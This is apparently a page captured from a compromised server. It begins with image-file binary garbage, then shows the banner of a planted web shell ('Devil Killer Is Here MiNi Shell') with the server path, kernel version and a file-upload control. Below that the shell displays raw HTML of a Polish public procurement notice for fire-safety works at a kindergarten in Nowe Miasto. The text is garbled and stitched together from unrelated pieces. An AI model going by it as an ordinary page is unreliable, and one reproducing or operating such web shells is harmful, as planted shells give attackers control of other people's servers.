JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220328/0010027101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja budynku Przedszkola Samorządowego im. Misia Uszatka w Nowym Mieście - wykonanie robót budowlanych poprawiających warunki bezpieczeństwa pożarowego w budynku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Nowe Miasto</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378284</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Apteczna 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowe Miasto</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">23 661 49 20</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">23 661 49 23</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@ugnowemiasto.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugnowemiasto.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja budynku Przedszkola Samorządowego im. Misia Uszatka w Nowym Mieście - wykonanie robót budowlanych poprawiających warunki bezpieczeństwa pożarowego w budynku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1dd328ef-ae7f-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00100271</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020472/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja budynku Przedszkola Samorządowego im. Misia Uszatka w Nowym Mieście - poprawa funkcjonalności budynku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://nowemiasto.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami (w szczególności składanie ofert, wymiana informacji, składanie oświadczeń i dokumentów) odbywa się drogą<br/>elektroniczną za pośrednictwem platformy e-Zamawiający pod adresem: https://nowemiasto.ezamawiajacy.pl. W sytuacjach<br/>awaryjnych (np.awaria platformy) jest możliwość komunikacji za pomocą poczty elektronicznej:info@ugnowemiasto.pl W takim<br/>wypadku strony potwierdzają fakt otrzymania wiadomości elektronicznej. Wykonawca zobowiązany jest do zapoznania się z<br/>Instrukcją korzystania z platformy. Za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz<br/>innych informacji przyjmuje się datę ich przekazania na platformę, a w przypadku przekazywania tych dokumentów oraz informacji za<br/>pomocą poczty elektronicznej–datą ich przesłania będzie potwierdzenie dostarczenia wiadomości zawierającej dokument/informację<br/>z serwera pocztowego Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgłoszenie do postępowania wymaga<br/>zalogowania Wykonawcy do Systemu na subdomenie https://nowemiasto.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki<br/>procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”. Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w<br/>procesie złożenia. Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem<br/>złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy<br/>skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>Po założeniu konta Wykonawca ma możliwość złożenia. Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z<br/>Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Miasta i Gminy<br/>Nowe Miasto tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>Zamawiający określa dopuszczalny format podpisu elektronicznego, jako: dokumenty w formacie „pdf&#34; zaleca się podpisywać<br/>formatem PAdES, dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z<br/>podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.<br/>Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.Stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; Komputer klasy PC lub MAC, o następującej konfiguracji:<br/>pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7Mac Os x 10.4, Linux, lub ich now-<br/>sze wersje; Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku<br/>Internet Explorer minimalnie wersja 10.0;Włączona obsługa JavaScript; Zainstalowany program Acrobat Reader lub inny obsługujący<br/>pliki w formacie .pdf. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf<br/>,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a,<br/>mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj. Plik załączony przez Wykonawcę na Platformie<br/>Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert. Sposób sporządzenia dokumentów<br/>elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgody z wymaganiami określonymi w rozporządzeniu<br/>Prezesa Rady Ministrów z dnia z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)	administratorem danych osobowych Wykonawców oraz osób wskazanych w ofertach jest <br/>Burmistrz Miasta i Gminy Nowe Miasto;<br/>2)	administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można skontaktować się poprzez email: iod@ugnowemiasto.pl lub pisemnie na adres siedziby administratora; <br/>3)	dane Wykonawców przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego SI.271.6.2022.NP prowadzonym <br/>w trybie podstawowym, na podstawie art. 275 pkt 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129 ze zm.), zwanej dalej „Pzp” oraz aktów wykonawczych do niej.<br/>4)	odbiorcami danych osobowych przekazanych przez Wykonawców będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 PZP; <br/>5)	dane osobowe zawarte w ofercie będą przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, okres rękojmi <br/>i gwarancji oraz przedawnienia roszczeń, wynikających z umowy; <br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy lub osób wskazanych w ofercie jest wymogiem ustawowym określonym <br/>w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP; <br/>7)	w odniesieniu do danych osobowych zwartych w ofercie, decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Wykonawca posiada: <br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych jego dotyczących; <br/>b) na podstawie art. 16 RODO prawo do sprostowania jego danych osobowych ; <br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna ,że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>9)	Wykonawcy nie przysługuje: <br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania jego danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SI.271.6.2022.NP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I - „Modernizacja budynku Przedszkola Samorządowego im. Misia Uszatka w Nowym Mieście - wykonanie robót budowlanych poprawiających warunki bezpieczeństwa pożarowego w budynku – ROBOTY BUDOWLANE” UWAGA: CZĘŚĆ ZAMÓWIENIA NIE OBEJMUJE POZYCJI 1.3 ORAZ 6 Z PRZEDMIARU OGÓLNOBUDOWLANEGO TJ. „DOSTAWY I MONTAŻU PÓŁSTAŁEGO URZĄDZENIA GAŚNICZEGO W SKŁADZIE OPAŁU” ORAZ „ZBIORNIKA WODY DO CELÓW PPOŻ” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45262690-4 - Remont starych budynków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty, spośród ofert Wykonawców, którzy spełniają<br/>warunki udziału w postępowaniu oraz warunki określone w SWZ zastosuje następujące kryteria:<br/>Cena (C) -znaczenie kryterium 60%<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższego wzoru:<br/>cena najniższa<br/>------------------- x 60 = ilość punktów w kryterium cena<br/>cena badana<br/>Oferta z najniższą ceną otrzyma w tym kryterium maksymalnie 60 pkt.<br/>Okres gwarancji (G) -znaczenie kryterium 40%<br/>Kryterium „okres gwarancji” będzie oceniane na podstawie okresu udzielonej przez Wykonawcę gwarancji na przedmiot zamówienia<br/>( roboty budowlane, materiały, wyposażenie) zadeklarowanej w pkt.7 Formularza oferty cenowej –Załącznik nr 2 do SWZ.<br/>Minimalny okres udzielonej gwarancji na wykonany przedmiot zamówienia wymagany przez Zamawiającego to okres 60 miesięcy,<br/>zaś okres maksymalny to 72 miesiące.<br/>Okres gwarancji liczony jest od dnia podpisania przez strony protokołu odbioru końcowego robót budowlanych. Przy ocenie ofert<br/>będzie brany pod uwagę okres udzielonej gwarancji (w pełnych miesiącach), ponad minimum wymagane w zamówieniu tj. ponad 60<br/>miesięcy.<br/>Oznacza to, że Wykonawca otrzyma punkty za w/w kryterium oceny ofert jeśli zaproponuje okres gwarancji wyższy niż 60 miesięcy<br/>tj. 66 m-cy lub 72 m-cy. W przypadku zaoferowania minimalnego, wymaganego okresu gwarancji (60 miesięcy) Wykonawca otrzyma<br/>0 pkt w ww. kryterium oceny ofert. Wykonawca może zaoferować również okres gwarancji 66 m-cy, wówczas otrzyma 20 pkt.<br/>Ogłoszenie nr 2022/BZP 00072341/01 z dnia 2022-03-02<br/>2022-03-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Maksymalny okres gwarancji podlegający punktacji to 72 miesiące. Oznacza to, że Wykonawca, który zaproponuje 72 miesiące<br/>gwarancji otrzyma maksymalną liczbę punktów w tym kryterium tj 40 pkt.<br/>Jeżeli Wykonawca nie zadeklaruje w formularzu oferty okresu gwarancji w miesiącach, wówczas Zamawiający przyjmie minimalny<br/>okres gwarancji wynoszący 60 miesięcy, a Wykonawca otrzyma 0 pkt w kryterium „ okres gwarancji”. Zamawiający określa<br/>minimalny oferowany okres gwarancji - 60 miesięcy Oferta z zaoferowanym okresem krótszym niż minimalny, zostanie odrzucona na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/>Zamawiający określa limit maksymalnego oferowanego okresu gwarancji - 72 miesiące.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż limitowany, do oceny oferty Zamawiający przyjmie okres skrócony do<br/>określonego maksimum limitu.<br/>Oferta z maksymalnym okresem gwarancji tj. 72 miesiące otrzyma w tym kryterium maksymalnie 40 pkt.<br/>Za najkorzystniejszą Zamawiający uznana ofertę, która uzyska największą liczbę punktów w wyniku zsumowania punktów w<br/>kryterium „cena” i „okres gwarancji” według poniższego<br/>wzoru:<br/>Łączna liczba punktów ocenianej oferty = C+G<br/>Ilość punktów w kryterium ,,cena”, ,,okres gwarancji” oraz łączna liczba punktów będą obliczane<br/>z dokładnością do dwóch miejsc po przecinku z zastosowaniem matematycznej zasady zaokrąglania do drugiego miejsca po<br/>przecinku. W powyższych kryteriach oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II - „Modernizacja budynku Przedszkola Samorządowego im. Misia Uszatka w Nowym Mieście - wykonanie robót budowlanych poprawiających warunki bezpieczeństwa pożarowego w budynku – ROBOTY ELEKTRYCZNE” UWAGA: CZĘŚĆ ZAMÓWIENIA OBEJMUJE POZYCJĘ 1.3 ORAZ 6 Z PRZEDMIARU OGÓLNOBUDOWLANEGO TJ. „DOSTAWY I MONTAŻU PÓŁSTAŁEGO URZĄDZENIA GAŚNICZEGO W SKŁADZIE OPAŁU” ORAZ „ZBIORNIKA WODY DO CELÓW PPOŻ” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45262690-4 - Remont starych budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty, spośród ofert Wykonawców, którzy spełniają<br/>warunki udziału w postępowaniu oraz warunki określone w SWZ zastosuje następujące kryteria:<br/>Cena (C) -znaczenie kryterium 60%<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższego wzoru:<br/>cena najniższa<br/>------------------- x 60 = ilość punktów w kryterium cena<br/>cena badana<br/>Oferta z najniższą ceną otrzyma w tym kryterium maksymalnie 60 pkt.<br/>Okres gwarancji (G) -znaczenie kryterium 40%<br/>Kryterium „okres gwarancji” będzie oceniane na podstawie okresu udzielonej przez Wykonawcę gwarancji na przedmiot zamówienia<br/>( roboty budowlane, materiały, wyposażenie) zadeklarowanej w pkt.7 Formularza oferty cenowej –Załącznik nr 2 do SWZ.<br/>Minimalny okres udzielonej gwarancji na wykonany przedmiot zamówienia wymagany przez Zamawiającego to okres 60 miesięcy,<br/>zaś okres maksymalny to 